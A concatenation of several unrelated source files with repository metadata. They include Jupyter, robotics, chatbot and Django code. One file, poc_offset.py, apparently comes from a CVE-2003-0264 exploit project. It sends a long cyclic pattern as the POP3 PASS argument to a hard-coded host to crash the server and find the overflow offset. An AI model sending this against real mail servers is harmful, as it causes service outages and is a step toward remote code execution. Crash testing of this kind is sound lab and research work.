acdfc5147c7d16215e7d6def362a268948a4a8b0 | 2,553 | py | Python | dsco/commands/jupyter.py | Teradata/dsco | 2dd39ec637d01aac30fee0a1feb596316b90d934 | [
"MIT"
] | 3 | 2020-03-20T13:01:54.000Z | 2021-10-19T17:49:18.000Z | dsco/commands/jupyter.py | Teradata/dsco | 2dd39ec637d01aac30fee0a1feb596316b90d934 | [
"MIT"
] | null | null | null | dsco/commands/jupyter.py | Teradata/dsco | 2dd39ec637d01aac30fee0a1feb596316b90d934 | [
"MIT"
] | null | null | null | """Provide the link to the jupyter notebook server including login token
"""
import os
from pathlib import Path
import subprocess
import yaml
from dsco.helpers import get_container
from dsco.local_options import Settings as settings
cmd_name = Path(__file__).stem
OKBLUE = "\033[94m"
REVERSED = "\u001b[7m"
UNDERLINE = "\033[4m"
ENDC = "\033[0m"
def add_subparser(subparsers):
sub = subparsers.add_parser(cmd_name, help="link to jupyter notebook")
sub.add_argument("--dev", action="store_true", help="dev")
sub.add_argument("--prod", action="store_true", help="prod")
sub.add_argument("--debug", action="store_true", help="debug")
sub.add_argument("--all", action="store_true", help="dev, prod, and debug")
def run_cmd(args, conf):
if conf["proj_root"]:
no_flag = not any([args.dev, args.prod, args.debug, args.all])
flag_list = [
# (service, service_flag)
("dev", args.dev or args.all or no_flag),
("prod", args.prod or args.all),
("debug", args.debug or args.all),
]
flagged_service_filter = lambda x: x[1]
proj_name = conf["pyproject"]["tool"]["poetry"]["name"]
local_settings = settings.get_local_kernal()
try:
local_ip = local_settings["properties"]["ip"]
except KeyError:
local_ip = "localhost"
for service, _ in filter(flagged_service_filter, flag_list):
get_container_cmd = get_container(proj_name, service)
ports = conf["docker_compose_yaml"]["services"][service]["ports"]
port = ports[0].split(":")[0]
cmd = f"docker exec -it $({get_container_cmd}) jupyter notebook list"
print(REVERSED + f"{proj_name + '_' + service:<88}" + ENDC)
print(OKBLUE + cmd + ENDC)
# expected output of cmd:
# Currently running servers:
# http://0.0.0.0:8888/notebook/?token=<token> :: /srv
try:
result = (
subprocess.run(cmd, shell=True, capture_output=True)
.stdout.decode("utf-8")
.strip()
.split("\n")
)[-1].split()[0]
except IndexError:
print(f"No server found.")
else:
token = result.split("=")[-1]
print(f"http://{local_ip}:{port}/notebook/?token={token}")
else:
print("No project found.")
def add_dispatch(dispatcher):
dispatcher[cmd_name] = run_cmd
| 34.5 | 81 | 0.578927 |
acdfc5b87a0cf03690ae7ab91879b6f3ee524514 | 2,829 | py | Python | modules/tools/navigation/planning/trajectory_generator.py | DavidSplit/apollo-3.0 | 9f82838e857e4c9146952946cbc34b9f35098deb | [
"Apache-2.0"
] | 6 | 2019-10-11T07:57:49.000Z | 2022-02-23T15:23:41.000Z | modules/tools/navigation/planning/trajectory_generator.py | DavidSplit/apollo-3.0 | 9f82838e857e4c9146952946cbc34b9f35098deb | [
"Apache-2.0"
] | null | null | null | modules/tools/navigation/planning/trajectory_generator.py | DavidSplit/apollo-3.0 | 9f82838e857e4c9146952946cbc34b9f35098deb | [
"Apache-2.0"
] | 12 | 2019-10-11T07:57:49.000Z | 2022-03-16T05:13:00.000Z | #!/usr/bin/env python
###############################################################################
# Copyright 2017 The Apollo Authors. All Rights Reserved.
# Modifications Copyright (c) 2018 LG Electronics, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import math
import time
import rospy
from numpy.polynomial.polynomial import polyval
from modules.planning.proto import planning_pb2
from modules.canbus.proto import chassis_pb2
from modules.common.proto import drive_state_pb2
def euclidean_distance(point1, point2):
sum = (point1[0] - point2[0]) * (point1[0] - point2[0])
sum += (point1[1] - point2[1]) * (point1[1] - point2[1])
return math.sqrt(sum)
def get_theta(point, point_base):
# print point
return math.atan2(1, 0) - math.atan2(point[0] - point_base[0],
point[1] - point_base[1])
class TrajectoryGenerator:
def __init__(self):
self.mobileye_pb = None
def generate(self, path, final_path_length, speed,
start_timestamp):
path_x, path_y = path.get_xy()
adc_trajectory = planning_pb2.ADCTrajectory()
adc_trajectory.header.timestamp_sec = rospy.Time.now().to_sec()
adc_trajectory.header.module_name = "planning"
adc_trajectory.gear = chassis_pb2.Chassis.GEAR_DRIVE
adc_trajectory.latency_stats.total_time_ms = \
(time.time() - start_timestamp) * 1000
s = 0
relative_time = 0
adc_trajectory.engage_advice.advice \
= drive_state_pb2.EngageAdvice.READY_TO_ENGAGE
for x in range(int(final_path_length - 1)):
y = path_y[x]
traj_point = adc_trajectory.trajectory_point.add()
traj_point.path_point.x = x
traj_point.path_point.y = y
if x > 0:
dist = euclidean_distance((x, y), (x - 1, path_y[x - 1]))
s += dist
relative_time += dist / speed
traj_point.path_point.theta = get_theta(
(x + 1, path_y[x + 1]), (0, path_y[0]))
traj_point.path_point.s = s
traj_point.v = speed
traj_point.relative_time = relative_time
return adc_trajectory
| 37.72 | 79 | 0.618593 |
acdfc7483feb68b40d100bd6710079886a362043 | 2,772 | py | Python | src/programy/parser/pattern/nodes/priority.py | cdoebler1/AIML2 | ee692ec5ea3794cd1bc4cc8ec2a6b5e5c20a0d6a | [
"MIT"
] | 345 | 2016-11-23T22:37:04.000Z | 2022-03-30T20:44:44.000Z | src/programy/parser/pattern/nodes/priority.py | MikeyBeez/program-y | 00d7a0c7d50062f18f0ab6f4a041068e119ef7f0 | [
"MIT"
] | 275 | 2016-12-07T10:30:28.000Z | 2022-02-08T21:28:33.000Z | src/programy/parser/pattern/nodes/priority.py | VProgramMist/modified-program-y | f32efcafafd773683b3fe30054d5485fe9002b7d | [
"MIT"
] | 159 | 2016-11-28T18:59:30.000Z | 2022-03-20T18:02:44.000Z | """
Copyright (c) 2016-2020 Keith Sterling http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from programy.parser.pattern.nodes.base import PatternNode
from programy.parser.pattern.equalsmatch import EqualsMatch
class PatternPriorityWordNode(PatternNode):
def __init__(self, word, userid='*'):
PatternNode.__init__(self, userid)
self._priority_word = word
@property
def priority_word(self):
return self._priority_word
def is_priority(self):
return True
def to_xml(self, client_context, include_user=False):
string = ""
if include_user is True:
string += '<priority userid="%s" word="%s">' % (self.userid, self.priority_word)
else:
string += '<priority word="%s">' % self.priority_word
string += super(PatternPriorityWordNode, self).to_xml(client_context)
string += '</priority>\n'
return string
def to_string(self, verbose=True):
if verbose is True:
return "PWORD [%s] [%s] word=[%s]" % (self.userid, self._child_count(verbose), self.priority_word)
return "PWORD [%s]" % (self.priority_word)
def equivalent(self, other):
if other.is_priority():
if self.userid == other.userid:
if self.priority_word == other.priority_word:
return True
return False
def equals(self, client_context, words, word_no):
word = words.word(word_no)
if self.userid != '*':
if self.userid != client_context.userid:
return EqualsMatch(False, word_no)
if self.equals_ignore_case(self.priority_word, word):
return EqualsMatch(True, word_no, word)
return EqualsMatch(False, word_no)
| 41.373134 | 120 | 0.694444 |
acdfc77b0ada0dbb771e2372e7856638104703c2 | 566 | py | Python | Nessus_Map/views.py | fa1c0n-king/Nessus_Map | 86546dd8e4e9294ed1f744e25d59f892d78d5d43 | [
"MIT"
] | 121 | 2019-11-24T15:18:48.000Z | 2022-03-08T16:31:23.000Z | Nessus_Map/views.py | fa1c0n-king/Nessus_Map | 86546dd8e4e9294ed1f744e25d59f892d78d5d43 | [
"MIT"
] | 9 | 2019-12-04T03:58:55.000Z | 2022-03-12T00:07:28.000Z | Nessus_Map/views.py | fa1c0n-king/Nessus_Map | 86546dd8e4e9294ed1f744e25d59f892d78d5d43 | [
"MIT"
] | 32 | 2019-12-02T03:49:56.000Z | 2022-01-07T08:57:31.000Z | from django.shortcuts import render, redirect
from django.conf import settings
from filebrowser.base import FileListing
def home_view(request):
filelisting = FileListing(settings.MEDIA_ROOT, sorting_by='date', sorting_order='desc')
files = filelisting.listing()
return render(request, 'index.html', {'files' : files})
def home_alert(request, alert):
filelisting = FileListing(settings.MEDIA_ROOT, sorting_by='date', sorting_order='desc')
files = filelisting.listing()
return render(request, 'index.html', {'files' : files, 'alert': alert})
| 40.428571 | 91 | 0.743816 |
acdfc7a7ba6feecbc79fd2c5d22724e458f8f4db | 14,298 | py | Python | packages/peripheralsInterface/scripts/driveByXbox360Controller.py | Falcons-Robocup/code | 2281a8569e7f11cbd3238b7cc7341c09e2e16249 | [
"Apache-2.0"
] | 2 | 2021-01-15T13:27:19.000Z | 2021-08-04T08:40:52.000Z | packages/peripheralsInterface/scripts/driveByXbox360Controller.py | Falcons-Robocup/code | 2281a8569e7f11cbd3238b7cc7341c09e2e16249 | [
"Apache-2.0"
] | null | null | null | packages/peripheralsInterface/scripts/driveByXbox360Controller.py | Falcons-Robocup/code | 2281a8569e7f11cbd3238b7cc7341c09e2e16249 | [
"Apache-2.0"
] | 5 | 2018-05-01T10:39:31.000Z | 2022-03-25T03:02:35.000Z | # Copyright 2018-2020 Jan Feitsma (Falcons)
# SPDX-License-Identifier: Apache-2.0
#!/usr/bin/env python3
# Author: Jan Feitsma
# Date: 2018-09-23
#
# This script requires a connected (USB) xbox 360 controller.
# It will feed the commands to motion, it can be even run on coach
# because it uses RTDB.
#
# Keys:
# left-stick: drive (forward, backward, strafe)
# right-stick: rotate
# right-trigger: shoot
# left-trigger: modify kicker height (hold while shooting)
# B: ballhandler on/off
#
# loosely based on: https://pypi.org/project/xbox360controller/ -- no, doesn't work: requires python3 which is incompatible with rtdb2
from __future__ import print_function
import argparse
import signal
import pygame
import sys, time
import pause, datetime
import falconspy
from rtdb2 import RtDB2Store, RTDB2_DEFAULT_PATH
class Button:
"""
A Button is a controller element which is either pressed or not.
Examples: A, left-stick (LS), right-bumber (RB), select.
"""
def __init__(self):
self.when_pressed = lambda:None
self.when_released = lambda:None
self.is_pressed = False
class Axis1:
"""
An Axis1 is a controller element which has a 1-dimensional value.
Examples: left-trigger (LT), right-trigger (RT).
"""
def __init__(self):
self.when_moved = lambda:None
self.x = 0.0
class Axis2:
"""
An Axis2 is a controller element which has a 2-dimensional value.
Examples: left-stick (LS), right-stick (RS).
"""
def __init__(self):
self.when_moved = lambda:None
self.x = 0.0
self.y = 0.0
class Xbox360Controller:
"""
Maintain live the state of the controller.
Can fire callbacks upon change.
Tries to mimick the behavior by https://pypi.org/project/xbox360controller.
Uses pygame to connect to the controller and handle events.
"""
def __init__(self, index=0, axis_threshold=0.2):
self.axis_threshold = axis_threshold
self.live_dump_mode = False
self.callback = lambda s: None
# setup controller elements
self.button_a = Button()
self.button_b = Button()
self.button_x = Button()
self.button_y = Button()
self.button_lb = Button() # left bumper
self.button_rb = Button() # right bumper
self.button_ls = Button() # left stick
self.button_rs = Button() # right stick
self.button_select = Button()
self.button_start = Button()
self.button_mode = Button() # a.k.a. globe
self.buttons = {"A": self.button_a, "B": self.button_b, "X": self.button_x, "Y": self.button_y,
"LB": self.button_lb, "RB": self.button_rb, "LS": self.button_ls, "RS": self.button_rs,
"select": self.button_select, "start": self.button_start, "mode": self.button_mode}
self.axis_lt = Axis1()
self.axis_rt = Axis1()
self.axis_lt.x = -1.0
self.axis_rt.x = -1.0
self.axis_ls = Axis2()
self.axis_rs = Axis2()
# store initial axis values, needed for delta tracking using threshold
self.prev = [0.0] * 6
# initialize controller
pygame.init()
pygame.joystick.init()
joysticks = [pygame.joystick.Joystick(x) for x in range(pygame.joystick.get_count())]
if len(joysticks) < 1:
raise Exception("no joysticks")
for idx in range(len(joysticks)):
print("detected joystick {}: {}".format(idx, joysticks[index].get_name()))
print("using joystick {}".format(index))
self.joystick = joysticks[index]
self.joystick.init()
self.frequency = 30.0 # Hz
def echo_onchange(self):
"""
Install callbacks to echo state change. Useful for testing controller state and developing.
"""
for b in self.buttons.keys():
# mind b=b to bind evaluation, otherwise python will behave lazy...
self.buttons[b].when_pressed = lambda b=b: print("button {} pressed".format(b))
self.buttons[b].when_released = lambda b=b: print("button {} released".format(b))
self.axis_lt.when_moved = lambda: print("trigger LT got value {:6.3f}".format(self.axis_lt.x))
self.axis_rt.when_moved = lambda: print("trigger RT got value {:6.3f}".format(self.axis_rt.x))
self.axis_ls.when_moved = lambda: print("stick LS got value ({:6.3f},{:6.3f})".format(self.axis_ls.x, self.axis_ls.y))
self.axis_rs.when_moved = lambda: print("stick RS got value ({:6.3f},{:6.3f})".format(self.axis_rs.x, self.axis_rs.y))
def live_dump(self):
self.live_dump_mode = True
def __str__(self):
s = "A={:d} B={:d} X={:d} Y={:d}".format(self.button_a.is_pressed, self.button_b.is_pressed, self.button_x.is_pressed, self.button_y.is_pressed)
s += " LB={:d} RB={:d} LS={:d} RS={:d}".format(self.button_lb.is_pressed, self.button_rb.is_pressed, self.button_ls.is_pressed, self.button_rs.is_pressed)
s += " sel={:d} st={:d} m={:d}".format(self.button_select.is_pressed, self.button_start.is_pressed, self.button_mode.is_pressed)
s += " LT={:6.3f} RT={:6.3f}".format(self.axis_lt.x, self.axis_rt.x)
s += " LS=({:6.3f},{:6.3f}) RS=({:6.3f},{:6.3f})".format(self.axis_ls.x, self.axis_ls.y, self.axis_rs.x, self.axis_rs.y)
return s
def run(self):
# loop using pygame
dt = datetime.timedelta(seconds=(1.0 / self.frequency))
t = datetime.datetime.now()
try:
# setup pygame index maps
buttons = {0: self.button_a, 1: self.button_b, 2: self.button_x, 3: self.button_y,
4: self.button_lb, 5: self.button_rb, 6: self.button_select, 7: self.button_start,
8: self.button_mode, 9: self.button_ls, 10: self.button_rs}
# iterate
done = False
while not done:
# initialize the list of callbacks to fire
callbacks = set()
# process all events
for event in pygame.event.get():
# done?
if event.type == pygame.QUIT:
done = True
# possible joystick actions: JOYAXISMOTION JOYBALLMOTION JOYBUTTONDOWN JOYBUTTONUP JOYHATMOTION
if event.type == pygame.JOYAXISMOTION:
ax = None
if event.axis == 0:
self.axis_ls.x = event.value
ax = self.axis_ls
elif event.axis == 1:
self.axis_ls.y = event.value
ax = self.axis_ls
elif event.axis == 2:
self.axis_lt.x = event.value
ax = self.axis_lt
elif event.axis == 3:
self.axis_rs.x = event.value
ax = self.axis_rs
elif event.axis == 4:
self.axis_rs.y = event.value
ax = self.axis_rs
elif event.axis == 5:
self.axis_rt.x = event.value
ax = self.axis_rt
# check against delta threshold and if needed update previous value
delta = abs(self.prev[event.axis] - event.value)
if delta > self.axis_threshold:
callbacks.add(ax.when_moved)
self.prev[event.axis] = event.value
elif event.type == pygame.JOYBUTTONDOWN:
button = buttons[event.button]
if not button.is_pressed:
callbacks.add(button.when_pressed)
button.is_pressed = True
elif event.type == pygame.JOYBUTTONUP:
button = buttons[event.button]
if button.is_pressed:
callbacks.add(button.when_released)
button.is_pressed = False
elif event.type == pygame.JOYHATMOTION:
pass # D-pad not supported
else:
raise Exception("cannot process joystick event: " + str(event))
# fire all callbacks
for f in callbacks:
f()
# dump?
if self.live_dump_mode:
print(self)
# callback
self.callback(self)
# sleep until
t += dt
pause.until(t)
except KeyboardInterrupt:
pass
class xRelay:
def __init__(self, robotId, joystickIndex=0):
# setup RTDB
self.robotId = robotId # TODO: allow live toggle via select button?
self.rtdb2Store = RtDB2Store(RTDB2_DEFAULT_PATH, False)
self.rtdb2Store.refresh_rtdb_instances()
# ballhandler enable/disable events
self.enable_bh = False
self.toggle_bh()
# setup controller callbacks
self.controller = Xbox360Controller(joystickIndex)
self.controller.button_b.when_pressed = self.toggle_bh
self.controller.callback = self.process_state
# motion limiters and timing
self.xy_max_speed = 1.2
self.xy_acceleration = 2.0
self.xy_deadzone = 0.3
self.vx = 0.0
self.vy = 0.0
self.rz_max_speed = 2.3
self.rz_acceleration = 3.0
self.rz_deadzone = 0.5
self.vrz = 0.0
self.dt = 1.0 / self.controller.frequency
# shooting
self.rt = -1.0
self.allow_lobshots = False
self.shoot_power_min = 20
self.shoot_power_max = 60
self.shoot_power_scale = 60
self.shoot_height_scale = 90
self.shoot_height_max = 180
# advanced actions
self.action = ""
def clip(self, v, lim):
return min(max(v, -lim), lim)
def toggle_bh(self):
self.enable_bh = not self.enable_bh
print("ballHandlers " + ["off", "on"][self.enable_bh])
def process_state(self, controller_state):
# helper function, very basic motion controller
def calc(current_setpoint, axis_input, speed_limit, acc_limit, deadzone):
"""
Calculate new setpoint based on axis input, current setpoint and motion limiters.
"""
target = axis_input * speed_limit
if abs(target) < deadzone:
return 0.0 # TODO: is abrupt braking OK?
if target > current_setpoint:
return min(current_setpoint + self.dt * acc_limit, target)
return max(current_setpoint - self.dt * acc_limit, target)
vx = calc(self.vx, controller_state.axis_ls.x, self.xy_max_speed, self.xy_acceleration, self.xy_deadzone)
vy = calc(self.vy, -controller_state.axis_ls.y, self.xy_max_speed, self.xy_acceleration, self.xy_deadzone) # inverted axis!
vrz = calc(self.vrz, -controller_state.axis_rs.x, self.rz_max_speed, self.rz_acceleration, self.rz_deadzone) # rz is defined counter-clockwise
v_string = "vx={:6.2f} vy={:6.2f} vrz={:6.2f}".format(vx, vy, vrz)
v_zero = "vx={:6.2f} vy={:6.2f} vrz={:6.2f}".format(0, 0, 0)
if v_string != v_zero:
print("{:.3f} {}".format(time.time(), v_string))
# store speed setpoints
self.vx = float(vx)
self.vy = float(vy)
self.vrz = float(vrz)
# kicker setpoints
self.kicker_height = float(min((controller_state.axis_lt.x + 1.0) * 0.5 * self.shoot_height_scale, self.shoot_height_max))
self.kicker_power = float(0.0)
if not self.allow_lobshots:
self.kicker_height = float(0.0)
# shoot if RT is being released
new_rt = controller_state.axis_rt.x
if (new_rt < self.rt - 0.2):
# kaboom!
# TODO: check if we have the ball
self.kicker_power = float(min(max((self.rt + 1.0) * 0.5 * self.shoot_power_scale, self.shoot_power_min), self.shoot_power_max))
print("shooting with height {:6.2f} and power {:6.2f}".format(self.kicker_height, self.kicker_power))
self.rt = -1.0 # reset to avoid immediate reshoot
else:
self.rt = new_rt
# check for special actions
self.action = ""
if controller_state.button_a.is_pressed:
self.action = "getBall"
if controller_state.button_x.is_pressed:
self.action = "passToTeamMember"
if controller_state.button_y.is_pressed:
self.action = "shootAtGoal"
# serialize and put into RTDB
item = [self.robotId, [self.vx, self.vy, self.vrz], self.enable_bh, self.kicker_height, self.kicker_power, self.action]
self.rtdb2Store.put(0, "JOYSTICK_CONTROL_" + str(self.robotId), item)
# shooting?
if self.kicker_power > 0.0:
time.sleep(0.5) # wait for ball to leave
def run(self):
self.controller.run()
def main(robotId, joystickIndex=0):
# RTDB relay
if 1:
xRelay(robotId, joystickIndex).run()
else:
# dev mode: echo controller state change
controller = Xbox360Controller()
#controller.echo_onchange()
controller.live_dump()
controller.run()
if __name__ == "__main__":
# Argument parsing.
descriptionTxt = 'Control given robot using a XBOX controller.\n(Or any other regular controller, tooling to be generalized.)\n'
exampleTxt = 'Example: driveByXbox360Controller.py 2\n'
parser = argparse.ArgumentParser(description=descriptionTxt, epilog=exampleTxt, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-i', '--index', help='joystick index to use', type=int, default=0)
parser.add_argument('robotId', help='target robot', type=int)
args = parser.parse_args()
# execute only if run as a script
main(args.robotId, args.index)
| 43.993846 | 162 | 0.58099 |
acdfc7cfed01351b766dcec9b2b8f65c35ae43bf | 3,132 | py | Python | poc_offset.py | SxNade/CVE-2003-0264_EXPLOIT | 3540fced3bd48154a1e34877739871dc7934a598 | [
"MIT"
] | null | null | null | poc_offset.py | SxNade/CVE-2003-0264_EXPLOIT | 3540fced3bd48154a1e34877739871dc7934a598 | [
"MIT"
] | null | null | null | poc_offset.py | SxNade/CVE-2003-0264_EXPLOIT | 3540fced3bd48154a1e34877739871dc7934a598 | [
"MIT"
] | null | null | null | import socket
import sys
import time
print("[+] Initiating the Crash Now!\n")
buff = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to the Application
s.connect(('192.168.1.117', 110))
s.recv(1024) #Recv the banner
#Enter the User
s.send('USER hacker\r\n')
s.recv(1024)
#Finally the vulnerable command PASS
s.send('PASS ' + buff + '\r\n')
s.send('QUIT\r\n')
s.close()
time.sleep(0.5)
print("[+] Done!")
| 111.857143 | 2,709 | 0.9553 |
acdfc8eeaed168ab0eab9d7e9fa11d126b5817b4 | 379 | py | Python | cvap/data/__init__.py | zhaoyanpeng/lvamodel | 93b06ff43ae6a76323cecea4c10cf457945c2711 | [
"MIT"
] | 6 | 2021-12-20T06:01:56.000Z | 2022-03-25T06:44:50.000Z | cvap/data/__init__.py | zhaoyanpeng/vipant | 93b06ff43ae6a76323cecea4c10cf457945c2711 | [
"MIT"
] | null | null | null | cvap/data/__init__.py | zhaoyanpeng/vipant | 93b06ff43ae6a76323cecea4c10cf457945c2711 | [
"MIT"
] | null | null | null | from .esc50 import build_xfold_dataloader_list
from .audio_text import build_audio_text_dataloader
from .image_text import build_image_text_dataloader
from .image_audio import build_image_audio_dataloader
from .audioset_clf import build_audioset_clf_dataloader
from .audioset_hub import (
build_audioset_dataloader,
build_audioset_label_map,
build_filter_set,
)
| 29.153846 | 55 | 0.852243 |
acdfc94830200e699189a1b8242c43c5926a0be0 | 358 | py | Python | pubsubat/pubsub/admin.py | zerobased-co/pubsub.at | c53ee698d3d2beced0147a8aa9707f69c3ef46c1 | [
"MIT"
] | null | null | null | pubsubat/pubsub/admin.py | zerobased-co/pubsub.at | c53ee698d3d2beced0147a8aa9707f69c3ef46c1 | [
"MIT"
] | null | null | null | pubsubat/pubsub/admin.py | zerobased-co/pubsub.at | c53ee698d3d2beced0147a8aa9707f69c3ef46c1 | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django_summernote.admin import SummernoteModelAdmin
from .models import (User, Category, Publisher, Subscription, )
admin.site.register(User, UserAdmin)
admin.site.register(Category)
admin.site.register(Publisher, SummernoteModelAdmin)
admin.site.register(Subscription)
| 32.545455 | 63 | 0.837989 |
